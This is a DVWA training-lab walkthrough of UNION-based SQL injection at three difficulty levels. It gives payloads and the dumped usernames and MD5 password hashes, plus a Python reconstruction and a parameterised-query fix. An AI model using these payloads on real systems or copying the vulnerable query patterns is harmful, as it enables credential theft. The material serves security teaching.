low
Looking at the source, the injection point id is treated as a string and is not validated at all, so a UNION payload can go straight in. The query selects two columns (first_name, last_name), so the UNION must also select two; the trailing # comments out the closing quote that the PHP code appends:
' union select first_name,password from users#
The returned result is below. Note that the Surname field now carries the password column, because UNION maps the second selected column into the last_name slot. The values are 32 hex characters, consistent with the unsalted MD5 hashes DVWA stores:
ID: ' union select first_name,password from users#
First name: admin
Surname: e2075474294983e013ee4dd2201c7a73
ID: ' union select first_name,password from users#
First name: Gordon
Surname: e99a18c428cb38d5f260853678922e03
ID: ' union select first_name,password from users#
First name: Hack
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: ' union select first_name,password from users#
First name: Pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: ' union select first_name,password from users#
First name: Bob
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
medium
Looking at the source, the code now runs the input through mysqli_real_escape_string to escape special characters, but the id is placed into the query as a number, with no surrounding quotes, so no quote is needed and the escaping has nothing to act on. The input is a drop-down rather than a free text field, so edit the option value in the page's HTML (or change the POST body in a proxy) and submit. Using 0 picks an id that does not exist, so only the UNION rows come back:
<option value="0 union select first_name,password from users">1</option>
The returned result is:
ID: 0 union select first_name,password from users
First name: admin
Surname: e2075474294983e013ee4dd2201c7a73
ID: 0 union select first_name,password from users
First name: Gordon
Surname: e99a18c428cb38d5f260853678922e03
ID: 0 union select first_name,password from users
First name: Hack
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: 0 union select first_name,password from users
First name: Pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: 0 union select first_name,password from users
First name: Bob
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
high
Looking at the source, the id is again treated as a string, but the query now ends in LIMIT 1. The method is essentially the same as low: the # comments out not only the closing quote but also the LIMIT 1 that follows it, which is why every row comes back despite the limit:
' union select first_name,password from users#
The returned result is:
ID: ' union select first_name,password from users#
First name: admin
Surname: e2075474294983e013ee4dd2201c7a73
ID: ' union select first_name,password from users#
First name: Gordon
Surname: e99a18c428cb38d5f260853678922e03
ID: ' union select first_name,password from users#
First name: Hack
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: ' union select first_name,password from users#
First name: Pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: ' union select first_name,password from users#
First name: Bob
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
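To make the three code-level differences concrete, here is an added example (not DVWA's PHP and not the author's code) that rebuilds the query shape of each level against an in-memory SQLite table and runs the payloads from the sections above, alongside the parameterised query that closes the hole. Two assumptions: SQLite's line comment is `-- ` rather than MySQL's `#`, so the payloads swap one for the other, and the sample rows are constructed from the output above with placeholder surnames.

```python
"""Constructed example: DVWA-style query shapes for low/medium/high against SQLite.

Not DVWA's own PHP. MySQL's '#' comment is replaced by SQLite's '-- ', and
the users table is built from the rows the walkthrough dumps (surnames are
placeholders, the hashes are the ones shown on the page).
"""
import sqlite3

# Constructed sample data mirroring the walkthrough's output.
USERS = [
    (1, "admin", "admin", "e2075474294983e013ee4dd2201c7a73"),
    (2, "Gordon", "Brown", "e99a18c428cb38d5f260853678922e03"),
    (3, "Hack", "Me", "8d3533d75ae2c3966d7e0d4fcc69216b"),
    (4, "Pablo", "Picasso", "0d107d09f5bbe40cade3de5c71e9e9b7"),
    (5, "Bob", "Smith", "5f4dcc3b5aa765d61d8327deb882cf99"),
]

# Page payloads, with MySQL's '#' swapped for SQLite's '-- ' where present.
LOW_PAYLOAD = "' union select first_name,password from users-- "
MEDIUM_PAYLOAD = "0 union select first_name,password from users"
# Balanced-quote variant with no comment, to show LIMIT 1 still biting.
HIGH_NO_COMMENT = "' union select first_name,password from users where '1'='1"


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
                "last_name TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", USERS)
    return con


def escape_quotes(value: str) -> str:
    """Stand-in for mysqli_real_escape_string (SQLite doubles quotes instead
    of backslash-escaping them). It only neutralises quote characters, so it
    does nothing useful when the value lands in the query unquoted."""
    return value.replace("'", "''")


def query_low(con, user_id: str):
    # Low: string context, no escaping, no LIMIT.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()


def query_medium(con, user_id: str):
    # Medium: escaped, but dropped into a numeric context with no quotes.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = {escape_quotes(user_id)}"
    return con.execute(sql).fetchall()


def query_high(con, user_id: str):
    # High: string context with LIMIT 1 appended after the closing quote.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}' LIMIT 1"
    return con.execute(sql).fetchall()


def query_fixed(con, user_id: str):
    # The fix: a bound parameter never reaches the SQL parser as code.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (user_id,)).fetchall()


def expected_dump():
    """(first_name, password) for every row, sorted, as the UNION leaks them."""
    return sorted((first, pw) for _, first, _, pw in USERS)


if __name__ == "__main__":
    con = make_db()
    print("low    :", query_low(con, LOW_PAYLOAD))
    print("medium :", query_medium(con, MEDIUM_PAYLOAD))
    print("high   : no comment ->", query_high(con, HIGH_NO_COMMENT))
    print("high   : comment    ->", query_high(con, LOW_PAYLOAD))
    print("fixed  :", query_fixed(con, LOW_PAYLOAD), query_fixed(con, "1"))
```

Run as-is: the three vulnerable shapes each return all five (first_name, hash) pairs, the high shape without the comment returns exactly one row because LIMIT 1 survives, and the parameterised query returns nothing for either payload while still resolving a legitimate id.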